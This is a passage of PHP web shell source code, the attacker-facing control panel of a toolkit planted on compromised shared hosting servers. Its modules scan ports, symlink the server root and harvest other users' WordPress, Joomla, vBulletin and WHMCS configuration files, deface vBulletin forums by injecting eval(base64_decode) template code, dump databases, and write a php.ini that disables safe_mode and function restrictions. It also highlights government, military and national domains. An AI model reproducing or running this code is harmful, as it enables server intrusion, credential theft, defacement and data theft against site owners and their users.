  1902.  
  1903.  
  1904. function findit($mytext,$starttag,$endtag) {
  1905.  $posLeft  = @stripos($mytext,$starttag)+strlen($starttag);
  1906.  $posRight = @stripos($mytext,$endtag,$posLeft+1);
  1907.  return  @substr($mytext,$posLeft,$posRight-$posLeft);
  1908.  flush();
  1909. }
  1910.  
  1911. ?>
  1912.  
  1913. <br><br>
  1914. <center>
  1915. <br>
  1916. <div class="sc">
  1917. <form method="post">
  1918. Site to scan :
  1919. <input type="text" name="site" size="30" class="inputz" value="<? if(isset($_POST['site'])){echo $_POST['site'];}else{echo $_SERVER['HTTP_HOST'];} ?>" />
  1920. <input type="submit" class="inputzbut" name="scan" value="Scan !"  />
  1921. </form>
  1922. </div>
  1923.  
  1924. <?php
  1925.  
  1926. if(isset($_POST['scan']))
  1927. {
  1928. $site =  @htmlentities($_POST['site']);
  1929.                  if (empty($site)){die('<br /><br /> Not add IP .. !');}
  1930.  
  1931. $ip_port = @gethostbyname($site);
  1932.  
  1933. ?>
  1934. <table class="tabnet" style="width:550px;">
  1935. <tbody>
  1936. <tr>
  1937. <th> SCANNING </th>
  1938. </tr>
  1939. <tr>
  1940. <td align="center"><br>
  1941. Site : <? echo $site; ?><br>
  1942. IP : <? echo $ip_port; ?><br>
  1943. <br></td>
  1944. </tr>
  1945. <tr>
  1946. <th> Open Port </th>
  1947. </tr>
  1948. <tr>
  1949. <td align="center">
  1950. <?
  1951. $list_post = array('80','21','22','2082','25','53','110','443','143');
  1952. foreach ($list_post as $o_port){
  1953.     $connect = @fsockopen($ip_port,$o_port,$errno,$errstr,5);
  1954.     if($connect){
  1955.         echo "$ip_port : $o_port &nbsp;&nbsp;&nbsp; <u style=\"color: #009900\">Open</u><br>";
  1956.         flush();
  1957.     }
  1958. }
  1959. ?>
  1960. </td>
  1961. </tr>
  1962. <tr>
  1963. <th> Domain Info </th>
  1964. </tr>
  1965. <tr>
  1966. <td align="center">
  1967. <? echo (susun_info(sws_domain_info($site))); ?>
  1968. </td>
  1969. </tr>
  1970. <tr>
  1971. <th> Network Info </th>
  1972. </tr>
  1973. <tr>
  1974. <td align="center">
  1975. <? echo (susun_info(sws_net_info($site))); ?>
  1976. </td>
  1977. </tr>
  1978. <tr>
  1979. <th> Subdomains Server </th>
  1980. </tr>
  1981. <tr>
  1982. <td align="center">
  1983. <? echo (susun_info(sws_sup_dom($site))); ?>
  1984. </td>
  1985. </tr>
  1986. </tbody>
  1987. </table>
  1988. </center>
  1989. <?
  1990.  
  1991. }
  1992. }
  1993.    
  1994. elseif(isset($_GET['x']) && ($_GET['x'] == 'identify'))
  1995. {  
  1996. ?>
  1997. <form action="?y=<?php echo $pwd; ?>&amp;x=identify" method="post">
  1998.  
  1999. <?php
  2000.  
  2001. if($win){
  2002.     echo "<br><br><center><h2>Not Available for Windows Server</h2></center>";
  2003. } else {
  2004.  
  2005. echo "<center><br><br>
  2006. <font style=\"color:#FF0000\">This function is used to identify some CMS on all website in this server</font><br>
  2007. <font style=\"color:#FF0000\">may take very long time and this shell gonna lag, if you want to continue, press \"Check Now\" button</font><br><br>
  2008. <form type=post>
  2009. <input type='submit' class='inputzbut' value='Check Now' name='checkingstart'>
  2010. </form></center>";
  2011.  
  2012. if (isset($_POST['checkingstart'])) {
  2013.  
  2014. echo "<center>";
  2015.  
  2016. $WebUrl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  2017. $Explode=explode('/',$WebUrl );
  2018. $WebUrl =str_replace($Explode[count($Explode)-1],'',$WebUrl );
  2019.  
  2020.  
  2021. @mkdir('sym',0777);
  2022. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2023. $write =@fopen ('sym/.htaccess','w');
  2024. fwrite($write ,$htaccess);
  2025. @symlink('/','sym/root');
  2026. $filelocation = basename(__FILE__);
  2027.  
  2028. $read_named_conf = @file('/etc/named.conf');
  2029. if(!$read_named_conf)
  2030. {
  2031. die (" can't read /etc/named.conf,Please use <a href='?vvip=sytc'>/etc Symlink</a>");
  2032. }
  2033. $new12 = explode (', ', $dis_func);
  2034. if (in_array('posix_getpwuid', $new12)){die('<center><b># posix_getpwuid is Not Supported</b></center>');}
  2035. else
  2036. {
  2037. echo "<div class='tmp'>
  2038. <table class='tabnet' width='500' ><td> Domains </td><td> Script </td>";
  2039. foreach($read_named_conf as $subject){
  2040. if(eregi('zone',$subject)){
  2041. preg_match_all('#zone "(.*)"#',$subject,$string);
  2042. flush();
  2043. if(strlen(trim($string[1][0])) >2){
  2044. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  2045. $Wordpress=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/wp-config.php';
  2046. $wp=get_headers($Wordpress);
  2047. $haystackwp=$wp[0];
  2048. $Wordpress2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/blog/wp-config.php';
  2049. $wp2=get_headers($Wordpress2);
  2050. $haystackwp2=$wp2[0];
  2051. $Joomla=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/configuration.php';
  2052. $jmla=get_headers($Joomla);
  2053. $haystackjmla=$jmla[0];
  2054. $Joomla2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/joomla/configuration.php';
  2055. $jmla2=get_headers($Joomla2);
  2056. $haystackjmla2=$jmla2[0];
  2057. $Vbulletin=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/includes/config.php';
  2058. $vb=get_headers($Vbulletin);
  2059. $haystackvb=$vb[0];
  2060. $Vbulletin3=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/vb/includes/config.php';
  2061. $vb3=get_headers($Vbulletin3);
  2062. $haystackvb2=$vb3[0];
  2063. $Vbulletin5=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/forum/includes/config.php';
  2064. $vb5=get_headers($Vbulletin5);
  2065. $haystackvb5=$vb5[0];
  2066. $whmcs1=$WebUrl.'/sym/root/home/'.$UID['name'].'public_html/clients/configuration.php';
  2067. $whm=get_headers($whmcs1);
  2068. $haystackwhm=$whm[0];
  2069. $whmcs1=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/support/configuration.php';
  2070. $whm=get_headers($whmcs1);
  2071. $haystackwhm=$whm[0];
  2072. $whmcs2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/client/configuration.php';
  2073. $whm2=get_headers($whmcs2);
  2074. $haystackwhm2=$whm2[0];
  2075. $whmcs3=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/submitticket.php';
  2076. $whm3=get_headers($whmcs3);
  2077. $haystackwhm3=$whm3[0];
  2078. $whmcs4=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/client/configuration.php';
  2079. $whm4=get_headers($whmcs4);
  2080. $haystackwhm=$whm4[0];
  2081. $Websitez = strpos($haystackwp,'200');
  2082. $Websitez='&nbsp;';
  2083. if (strpos($haystackwp,'200') == true )
  2084. {
  2085. $Websitez="<a href='".$Wordpress."' target='_blank'>Wordpress</a>";
  2086. }
  2087. elseif (strpos($haystackwp2,'200') == true)
  2088. {
  2089. $Websitez="<a href='".$Wordpress2."' target='_blank'>Wordpress</a>";
  2090. }
  2091. elseif (strpos($haystackjmla,'200')  == true and strpos($haystackwhm3,'200')  == true )
  2092. {
  2093. $Websitez=" <a href='".$whmcs3."' target='_blank'>WHMCS</a>";
  2094. }
  2095. elseif (strpos($haystackwhm,'200')  == true)
  2096. {
  2097. $Websitez =" <a href='".$whmcs1."' target='_blank'>WHMCS</a>";
  2098. }
  2099. elseif (strpos($haystackwhm2,'200')  == true)
  2100. {
  2101. $Websitez =" <a href='".$whmcs2."' target='_blank'>WHMCS</a>";
  2102. }
  2103. elseif (strpos($haystackjmla,'200')  == true)
  2104. {
  2105. $Websitez=" <a href='".$Joomla."' target='_blank'>Joomla</a>";
  2106. }
  2107. elseif (strpos($haystackjmla2,'200')  == true)
  2108. {
  2109. $Websitez=" <a href='".$Joomla2."' target='_blank'>Joomla</a>";
  2110. }
  2111. elseif (strpos($haystackvb,'200')  == true)
  2112. {
  2113. $Websitez=" <a href='".$Vbulletin."' target='_blank'>vBulletin</a>";
  2114. }
  2115. elseif (strpos($haystackvb2,'200')  == true)
  2116. {
  2117. $Websitez=" <a href='".$Vbulletin3."' target='_blank'>vBulletin</a>";
  2118. }
  2119. elseif (strpos($Vbulletin4,'200')  == true)
  2120. {
  2121. $Websitez=" <a href='".$Vbulletin5."' target='_blank'>vBulletin</a>";
  2122. }
  2123. else
  2124. {
  2125. continue;
  2126. }
  2127. $name = $UID['name'] ;
  2128. echo '<tr><td><a href=http://www.'.$string[1][0].'/>'.$string[1][0].'</a></td>
  2129. <td>'.$Websitez.'</td></tr></center>';
  2130. flush();
  2131. }
  2132. }
  2133. }
  2134. }
  2135. }
  2136. }
  2137. }
  2138.  
  2139. elseif(isset($_GET['x']) && ($_GET['x'] == 'vb'))
  2140. {  
  2141. ?>
  2142. <form action="?y=<?php echo $pwd; ?>&amp;x=vb" method="post">
  2143.  
  2144. <br><br><br><div align="center">
  2145. <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
  2146. <font color="#00FF00">&nbsp;vB Index Changer</font><font color="#FF0000">
  2147. <font face="Tahoma">! Change All Pages For Forum !&nbsp;
  2148. <br></font></div><br>
  2149.  
  2150. <?
  2151.  
  2152. if(empty($_POST['index'])){
  2153. echo "<center><FORM method=\"POST\">
  2154. host : <INPUT size=\"15\" value=\"localhost\" class='inputz' name=\"localhost\" type=\"text\">
  2155. database : <INPUT size=\"15\" class='inputz' value=\"forum_vb\" name=\"database\" type=\"text\"><br>
  2156. username : <INPUT size=\"15\" class='inputz' value=\"forum_vb\" name=\"username\" type=\"text\">
  2157. password : <INPUT size=\"15\" class='inputz' value=\"vb\" name=\"password\" type=\"text\"><br>
  2158. <br>
  2159. <textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
  2160. <INPUT value=\"Set\" class='inputzbut' name=\"send\" type=\"submit\">
  2161. </FORM></center>";
  2162. }else{
  2163. $localhost = $_POST['localhost'];
  2164. $database = $_POST['database'];
  2165. $username = $_POST['username'];
  2166. $password = $_POST['password'];
  2167. $index = $_POST['index'];
  2168. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2169. @mysql_select_db($database) or die(mysql_error());
  2170.  
  2171. $index=str_replace("\'","'",$index);
  2172.  
  2173. $set_index = "{\${eval(base64_decode(\'";
  2174.  
  2175. $set_index .= base64_encode("echo \"$index\";");
  2176.  
  2177.  
  2178. $set_index .= "\'))}}{\${exit()}}</textarea>";
  2179.  
  2180. echo("UPDATE template SET template ='".$set_index."' ") ;
  2181. $ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error());
  2182.  
  2183. if($ok){
  2184. echo "!! update finish !!<br><br>";
  2185. }
  2186.  
  2187. }
  2188. # Footer
  2189. }
  2190.    
  2191.    
  2192. elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
  2193. {  
  2194. ?>
  2195. <form action="?y=<?php echo $pwd; ?>&amp;x=symlink" method="post">
  2196.  
  2197. <?php  
  2198.  
  2199. if($win){
  2200.     echo "<br><br><center><h2>Not Available for Windows Server</h2></center>";
  2201. } else {
  2202.  
  2203. @set_time_limit(0);
  2204.  
  2205. echo "<center>";
  2206.  
  2207. @mkdir('sym',0777);
  2208. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2209. $write =@fopen ('sym/.htaccess','w');
  2210. fwrite($write ,$htaccess);
  2211. @symlink('/','sym/root');
  2212. $filelocation = basename(__FILE__);
  2213. $read_named_conf = @file('/etc/named.conf');
  2214. if(!$read_named_conf)
  2215. {
  2216. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  2217. }
  2218. else
  2219. {
  2220. echo "<br><br><div class='tmp'>
  2221. <table class='tabnet' width='500'>
  2222. <tbody>
  2223. <tr><th align=center colspan=3>SymLink</th></tr>
  2224. <tr><td>Domains</td><td>Users</td><td> </td></tr>";
  2225. foreach($read_named_conf as $subject){
  2226. if(eregi('zone',$subject)){
  2227. preg_match_all('#zone "(.*)"#',$subject,$string);
  2228. flush();
  2229. if(strlen(trim($string[1][0])) >2){
  2230. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  2231. $name = $UID['name'] ;
  2232. @symlink('/','sym/root');
  2233. $name   = $string[1][0];
  2234. $iran   = '\.ir';
  2235. $israel = '\.il';
  2236. $indo   = '\.id';
  2237. $sg12   = '\.sg';
  2238. $edu    = '\.edu';
  2239. $gov    = '\.gov';
  2240. $gose   = '\.go';
  2241. $gober  = '\.gob';
  2242. $mil1   = '\.mil';
  2243. $mil2   = '\.mi';
  2244. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  2245. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
  2246. {
  2247. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  2248. }
  2249. echo "
  2250. <tr>
  2251. <td>
  2252. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  2253. </td>
  2254. <td>
  2255. '.$UID['name']."
  2256. </td>
  2257.  
  2258. <td>
  2259. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  2260. </td>
  2261.  
  2262. </tr></div> ";
  2263. flush();
  2264. }
  2265. }
  2266. }
  2267. }
  2268.  
  2269. echo "</center></tbody></table>";  
  2270.  
  2271. }
  2272. }
  2273.  
  2274. elseif(isset($_GET['x']) && ($_GET['x'] == 'mysqlbackup'))
  2275. {  
  2276. ?>
  2277. <form action="?y=<?php echo $pwd; ?>&amp;x=mysqlbackup" method="post">
  2278.  
  2279. <?php
  2280.  
  2281. echo '<center><br><br><br>
  2282. <table class="tabnet" border=1 width=400 style="border-collapse: collapse" cellpadding=2>
  2283. <tr>
  2284. <td width=400 colspan=2 ><p align=center>
  2285. <b><font face=Arial size=2 >Backup Database</font></b>
  2286. </td></tr>
  2287. <tr>
  2288. <td width=150>
  2289. <font face=Arial size=2>DB Type:</font></td>
  2290. <td width=250>
  2291. <form method=post action="'.$me.'">
  2292. <select class="inputz" name=method>
  2293. <option value="gzip">Gzip</option>
  2294. <option value="sql">Sql</option>
  2295. </select></td></tr>
  2296. <tr>
  2297. <td width=150>
  2298. <font face=Arial size=2>Server:</font>
  2299. </td>
  2300. <td width=250>
  2301. <input type=text class="inputz" name=server value=localhost size=35>
  2302. </td></tr>
  2303. <tr>
  2304. <td width=150><font face=Arial size=2>Username:</font></td>
  2305. <td width=250><input type=text class="inputz" name=username size=35></td>
  2306. </tr>
  2307. <tr>
  2308. <td width=150><font face=Arial size=2>Password:</font></td>
  2309. <td width=250><input type=text class="inputz" name=password></td>
  2310. </tr>
  2311. <tr>
  2312. <td width=150><font face=Arial size=2>Data Base Name:</font></td>
  2313. <td width=250><input type=text class="inputz" name=dbname></td>
  2314. </tr>
  2315. <tr>
  2316. <td width=400 colspan=2><center><input class="inputzbut" type=submit value="  Dump!  " ></td>
  2317. </tr>
  2318. </table></form></center></table>';
  2319. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  2320. $date = date("Y-m-d");
  2321. $dbserver = $_POST['server'];
  2322. $dbuser = $_POST['username'];
  2323. $dbpass = $_POST['password'];
  2324. $dbname = $_POST['dbname'];
  2325. $file = "Dump-$dbname-$date";
  2326. $method = $_POST['method'];
  2327. if ($method=='sql'){
  2328. $file="Dump-$dbname-$date.sql";
  2329. $fp=fopen($file,"w");
  2330. }else{
  2331. $file="Dump-$dbname-$date.sql.gz";
  2332. $fp = gzopen($file,"w");
  2333. }
  2334. function write($data) {
  2335. global $fp;
  2336. if ($_POST['method']=='sql'){
  2337. fwrite($fp,$data);
  2338. }else{
  2339. gzwrite($fp, $data);
  2340. }}
  2341.  
  2342. function filesize_n($path)
  2343. {
  2344.         $size = @filesize($path);
  2345.         if( $size < 0 ){
  2346.             ob_start();
  2347.             system('ls -al "'.$path.'" | awk \'BEGIN {FS=" "}{print $5}\'');
  2348.             $size = ob_get_clean();
  2349.         }
  2350.  
  2351.         return $size;
  2352. }
  2353. function format_size($size) {
  2354.       $sizes = array(" Bytes", " KB", " MB", " GB", " TB", " PB", " EB", " ZB", " YB");
  2355.       if ($size == 0) { return('n/a'); } else {
  2356.       return (round($size/pow(1024, ($i = floor(log($size, 1024)))), $i > 1 ? 2 : 0) . $sizes[$i]); }
  2357. }
  2358. mysql_connect ($dbserver, $dbuser, $dbpass);
  2359. mysql_select_db($dbname);
  2360. $tables = mysql_query ("SHOW TABLES");
  2361. while ($i = mysql_fetch_array($tables)) {
  2362.     $i = $i['Tables_in_'.$dbname];
  2363.     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  2364.     write($create['Create Table'].";\n\n");
  2365.     $sql = mysql_query ("SELECT * FROM ".$i);
  2366.     if (mysql_num_rows($sql)) {
  2367.         while ($row = mysql_fetch_row($sql)) {
  2368.             foreach ($row as $j => $k) {
  2369.                 $row[$j] = "'".mysql_escape_string($k)."'";
  2370.             }
  2371.             write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
  2372.         }
  2373.     }
  2374. }
  2375. if ($method=='sql'){
  2376. fclose ($fp);
  2377. }else{
  2378. gzclose($fp);}
  2379. $sizedatabasefile = filesize_n($file);
  2380. $sizehumanreadable = format_size($sizedatabasefile);
  2381. echo "<br><br>
  2382. <center><font color='#FF0000'>Download Database -&#62; </font>
  2383. <a href='$file'>Here</a>
  2384. <font color='#FF0000'> | DatabaseFileSize -&#62; $sizehumanreadable </font></center>";
  2385. flush();
  2386. }
  2387. }
  2388.  
  2389. elseif(isset($_GET['x']) && ($_GET['x'] == 'security-mode'))
  2390. {  
  2391. ?>
  2392. <form action="?y=<?php echo $pwd; ?>&amp;x=security-mode" method="post">
  2393.  
  2394. <?php
  2395.  
  2396. echo "<form method='POST' >
  2397. <center><br><br><br>
  2398. <table class='tabnet'>
  2399. </tbody>
  2400. <tr><th colspan=2>Disable SafeMode and Clear Disable Function using php.ini</th></tr>
  2401. <tr><td>Path to Disable : </td><td><input type='text' size=30 class='inputz' name='phpinisafemode' value=".$pwd."></td></tr>
  2402. <tr><td align=center colspan=2><input type='submit' class='inputzbut' name='dsmsubmit' value='Create PHP.INI' /></td></tr>
  2403. </tbody></table>
  2404. <br></form>";
  2405.  
  2406. $dirphpini = $_POST['phpinisafemode'];
  2407. $phpininamelol = "php.ini";
  2408.  
  2409. $dataphpini = "ZW5naW5lID0gT24NCnNob3J0X29wZW5fdGFnID0gT24NCmFzcF90YWdzID0gT2ZmDQpwcmVjaXNpb24gICAgPSAgMTINCnkya19jb21wbGlhbmNlID0gT24NCm91dHB1dF9idWZmZXJpbmcgPSBPZmYNCnpsaWIub3V0cHV0X2NvbXByZXNzaW9uID0gT2ZmDQppbXBsaWNpdF9mbHVzaCA9IE9mZg0KdW5zZXJpYWxpemVfY2FsbGJhY2tfZnVuYz0NCnNlcmlhbGl6ZV9wcmVjaXNpb24gPSAxMDANCmFsbG93X2NhbGxfdGltZV9wYXNzX3JlZmVyZW5jZSA9IE9uDQpzYWZlX21vZGUgPSBPZmYNCmRpc2FibGVfY2xhc3NlcyA9DQptYXhfZXhlY3V0aW9uX3RpbWUgPSAxMjAgICAgIDsgTWF4aW11bSBleGVjdXRpb24gdGltZSBvZiBlYWNoIHNjcmlwdCwgaW4gc2Vjb25kcw0KbWF4X2lucHV0X3RpbWUgPSA5MAk7IE1heGltdW0gYW1vdW50IG9mIHRpbWUgZWFjaCBzY3JpcHQgbWF5IHNwZW5kIHBhcnNpbmcgcmVxdWVzdCBkYXRhDQptZW1vcnlfbGltaXQgPSA3NTZNICAgICAgOyBNYXhpbXVtIGFtb3VudCBvZiBtZW1vcnkgYSBzY3JpcHQgbWF5IGNvbnN1bWUgKDMyTUIpDQplcnJvcl9yZXBvcnRpbmcgPSBFX0FMTCAmIH5FX05PVElDRSAmIH5FX0RFUFJFQ0FURUQNCmRpc3BsYXlfZXJyb3JzID0gT24NCmRpc3BsYXlfc3RhcnR1cF9lcnJvcnMgPSBPZmYNCmxvZ19lcnJvcnMgPSBPbg0KbG9nX2Vycm9yc19tYXhfbGVuID0gMTAyNA0KaWdub3JlX3JlcGVhdGVkX2Vycm9ycyA9IE9mZg0KaWdub3JlX3JlcGVhdGVkX3NvdXJjZSA9IE9mZg0KcmVwb3J0X21lbWxlYWtzID0gT24NCnRyYWNrX2Vycm9ycyA9IE9mZg0KZXJyb3JfbG9nID0gZXJyb3JfbG9nDQp2YXJpYWJsZXNfb3JkZXIgPSAiRUdQQ1MiDQpyZWdpc3Rlcl9nbG9iYWxzID0gT2ZmDQpyZWdpc3Rlcl9hcmdjX2FyZ3YgPSBPbg0KcG9zdF9tYXhfc2l6ZSA9IDhNDQpncGNfb3JkZXIgPSAiR1BDIg0KYXV0b19wcmVwZW5kX2ZpbGUgPQ0KYXV0b19hcHBlbmRfZmlsZSA9DQpkZWZhdWx0X21pbWV0eXBlID0gInRleHQvaHRtbCINCmluY2x1ZGVfcGF0aCA9ICIuOi91c3IvbGliL3BocDovdXNyL2xvY2FsL2xpYi9waHAiDQpkb2Nfcm9vdCA9DQp1c2VyX2RpciA9DQpleHRlbnNpb25fZGlyID0gIi91c3IvbG9jYWwvbGliL3BocC9leHRlbnNpb25zL25vLWRlYnVnLW5vbi16dHMtMjAwOTA2MjYiDQp6ZW5kX2V4dGVuc2lvbj0iL3Vzci9sb2NhbC9Jb25DdWJlL2lvbmN1YmVfbG9hZGVyX2xpbl81LjMuc28iDQpleHRlbnNpb249ImVhY2NlbGVyYXRvci5zbyINCmVhY2NlbGVyYXRvci5jYWNoZV9kaXI9Ii9ob21lL2VhY2NlbGVyYXRvciINCmVhY2NlbGVyYXRvci5jaGVja19tdGltZT0iMSINCmVhY2NlbGVyYXRvci5jb21wcmVzcz0iMSINCmVhY2NlbGVyYXRvci5jb21wcmVzc19sZXZlbD0iOSINCmVhY2NlbGVyYXRvci5kZWJ1Zz0iMCINCmVhY2NlbGVyYXRvci5lbmFibGU9IjEiDQplYWNjZWxlcmF0b3IuZmlsdGVyPSIiDQplYWNjZWxlcmF0b3Iub3B0aW1pemVyPSIxIg0KZWFjY2VsZXJhdG9yLnNobV9tYXg9IjAiDQplYWNjZWxlcmF0b3Iuc2htX29ubHk9IjAiDQplYWNjZWxlcmF0b3Iuc2htX3BydW5lX3BlcmlvZD0iMCINCmVhY2NlbGVyYXRvci5zaG1fc2l6ZT0iMTYiDQplYWNjZWxlcmF0b3Iuc2htX3R0bD0iMCINCmV4dGVuc2lvbj0ic3Vob3Npbi5zbyINCmV4dGVuc2lvbj10aW1lem9uZWRiLnNvDQplbmFibGVfZGwgPSBPZmYNCmZpbGVfdXBsb2FkcyA9IE9uDQp1cGxvYWRfbWF4X2ZpbGVzaXplID0gMTBNDQphbGxvd191cmxfZm9wZW4gPSBPbg0KZGVmYXVsdF9zb2NrZXRfdGltZW91dCA9IDYwDQpzbXRwX3BvcnQgPSAyNQ0Kc2VuZG1haWxfcGF0aCA9ICIvdXNyL3NiaW4vc2VuZG1haWwgLXQgLWkiDQpzcWwuc2FmZV9tb2RlID0gT2ZmDQpvZGJjLmFsbG93X3BlcnNpc3RlbnQgPSBPbg0Kb2RiYy5jaGVja19wZXJzaXN0ZW50ID0gT24NCm9kYmMubWF4X3BlcnNpc3RlbnQgPSAtMQ0Kb2RiYy5tYXhfbGlua3MgPSAtMSAgDQpvZGJjLmRlZmF1bHRscmwgPSA0MDk2ICANCm9kYmMuZGVmYXVsdGJpbm1vZGUgPSAxICANCm15c3FsLmFsbG93X3BlcnNpc3RlbnQgPSBPbg0KbXlzcWwubWF4X3BlcnNpc3RlbnQgPSAtMQ0KbXlzcWwubWF4X2xpbmtzID0gLTENCm15c3FsLmRlZmF1bHRfcG9ydCA9DQpteXNxbC5kZWZhdWx0X3NvY2tldCA9DQpteXNxbC5kZWZhdWx0X2hvc3QgPQ0KbXlzcWwuZGVmYXVsdF91c2VyID0NCm15c3FsLmRlZmF1bHRfcGFzc3dvcmQgPQ0KbXlzcWwuY29ubmVjdF90aW1lb3V0ID0gNjANCm15c3FsLnRyYWNlX21vZGUgPSBPZmYNCm1zcWwuYWxsb3dfcGVyc2lzdGVudCA9IE9uDQptc3FsLm1heF9wZXJzaXN0ZW50ID0gLTENCm1zcWwubWF4X2xpbmtzID0gLTENCnBnc3FsLmFsbG93X3BlcnNpc3RlbnQgPSBPbg0KcGdzcWwuYXV0b19yZXNldF9wZXJzaXN0ZW50ID0gT2ZmIA0KcGdzcWwubWF4X3BlcnNpc3RlbnQgPSAtMQ0KcGdzcWwubWF4X2xpbmtzID0gLTENCnBnc3FsLmlnbm9yZV9ub3RpY2UgPSAwDQpwZ3NxbC5sb2dfbm90aWNlID0gMA0Kc3liYXNlLmFsbG93X3BlcnNpc3RlbnQgPSBPbg0Kc3liYXNlLm1heF9wZXJzaXN0ZW50ID0gLTENCnN5YmFzZS5tYXhfbGlua3MgPSAtMQ0Kc3liYXNlLm1pbl9lcnJvcl9zZXZlcml0eSA9IDEwDQpzeWJhc2UubWluX21lc3NhZ2Vfc2V2ZXJpdHkgPSAxMA0Kc3liYXNlLmNvbXBhdGFiaWxpdHlfbW9kZSA9IE9mZg0Kc3liY3QuYWxsb3dfcGVyc2lzdGVudCA9IE9uDQpzeWJjdC5tYXhfcGVyc2lzdGVudCA9IC0xDQpzeWJjdC5tYXhfbGlua3MgPSAtMQ0Kc3liY3QubWluX3NlcnZlcl9zZXZlcml0eSA9IDEwDQpzeWJjdC5taW5fY2xpZW50X3NldmVyaXR5ID0gMTANCmRieC5jb2xuYW1lc19jYXNlID0gInVuY2hhbmdlZCINCmJjbWF0aC5zY2FsZSA9IDANCmlmeC5kZWZhdWx0X2hvc3QgPQ0KaWZ4LmRlZmF1bHRfdXNlciA9DQppZnguZGVmYXVsdF9wYXNzd29yZCA9DQppZnguYWxsb3dfcGVyc2lzdGVudCA9IE9uDQppZngubWF4X3BlcnNpc3RlbnQgPSAtMQ0KaWZ4Lm1heF9saW5rcyA9IC0xDQppZngudGV4dGFzdmFyY2hhciA9IDANCmlmeC5ieXRlYXN2YXJjaGFyID0gMA0KaWZ4LmNoYXJhc3ZhcmNoYXIgPSAwDQppZnguYmxvYmluZmlsZSA9IDANCmlmeC5udWxsZm9ybWF0ID0gMA0Kc2Vzc2lvbi5zYXZlX2hhbmRsZXIgPSBmaWxlcw0Kc2Vzc2lvbi5zYXZlX3BhdGggPSAvdG1wDQpzZXNzaW9uLnVzZV9jb29raWVzID0gMQ0Kc2Vzc2lvbi5uYW1lID0gUEhQU0VTU0lEDQpzZXNzaW9uLmF1dG9fc3RhcnQgPSAwDQpzZXNzaW9uLmNvb2tpZV9saWZldGltZSA9IDANCnNlc3Npb24uY29va2llX3BhdGggPSAvDQpzZXNzaW9uLmNvb2tpZV9kb21haW4gPQ0Kc2Vzc2lvbi5zZXJpYWxpemVfaGFuZGxlciA9IHBocA0Kc2Vzc2lvbi5nY19wcm9iYWJpbGl0eSA9IDENCnNlc3Npb24uZ2NfZGl2aXNvciAgICAgPSAxMDANCnNlc3Npb24uZ2NfbWF4bGlmZXRpbWUgPSAxNDQwDQpzZXNzaW9uLmJ1Z19jb21wYXRfNDIgPSAxDQpzZXNzaW9uLmJ1Z19jb21wYXRfd2FybiA9IDENCnNlc3Npb24ucmVmZXJlcl9jaGVjayA9DQpzZXNzaW9uLmVudHJvcHlfbGVuZ3RoID0gMA0Kc2Vzc2lvbi5lbnRyb3B5X2ZpbGUgPQ0Kc2Vzc2lvbi5jYWNoZV9saW1pdGVyID0gbm9jYWNoZQ0Kc2Vzc2lvbi5jYWNoZV9leHBpcmUgPSAxODANCnNlc3Npb24udXNlX3RyYW5zX3NpZCA9IDANCnVybF9yZXdyaXRlci50YWdzID0gImE9aHJlZixhcmVhPWhyZWYsZnJhbWU9c3JjLGlucHV0PXNyYyxmb3JtPSxmaWVsZHNldD0iDQptc3NxbC5hbGxvd19wZXJzaXN0ZW50ID0gT24NCm1zc3FsLm1heF9wZXJzaXN0ZW50ID0gLTENCm1zc3FsLm1heF9saW5rcyA9IC0xDQptc3NxbC5taW5fZXJyb3Jfc2V2ZXJpdHkgPSAxMA0KbXNzcWwubWluX21lc3NhZ2Vfc2V2ZXJpdHkgPSAxMA0KbXNzcWwuY29tcGF0YWJpbGl0eV9tb2RlID0gT2ZmDQptc3NxbC5zZWN1cmVfY29ubmVjdGlvbiA9IE9mZg0KaW5ncmVzLmFsbG93X3BlcnNpc3RlbnQgPSBPbg0KaW5ncmVzLm1heF9wZXJzaXN0ZW50ID0gLTENCmluZ3Jlcy5tYXhfbGlua3MgPSAtMQ0KaW5ncmVzLmRlZmF1bHRfZGF0YWJhc2UgPQ0KaW5ncmVzLmRlZmF1bHRfdXNlciA9DQppbmdyZXMuZGVmYXVsdF9wYXNzd29yZCA9DQpwZnByby5kZWZhdWx0aG9zdCA9ICJ0ZXN0LXBheWZsb3cudmVyaXNpZ24uY29tIg0KcGZwcm8uZGVmYXVsdHBvcnQgPSA0NDMNCnBmcH